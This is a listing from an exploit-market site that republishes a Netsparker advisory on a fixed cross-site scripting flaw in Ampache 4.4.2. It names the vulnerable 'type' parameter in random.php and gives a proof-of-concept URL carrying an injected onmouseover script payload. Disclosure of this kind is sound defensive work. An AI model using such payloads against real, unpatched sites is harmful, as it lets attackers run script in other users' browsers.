[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ampache 4.4.2 Cross Site Scripting Vulnerability

Author
Daniel Bishtawi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36582
Category
web applications
Date add
21-07-2021
Platform
php
Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting vulnerability in Ampache 4.4.2
Affected Software: Ampache
Affected Versions: 4.4.2
Homepage: http://ampache.org/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-21-003

Technical Details
--------------------

Cross-site scripting in Random.php

URL:
http://alihost:1134/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%22+ns%3dnetsparker(0x0002DE)+

For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-003-cross-site-scripting-in-ampache/

#  0day.today [2024-11-15]  #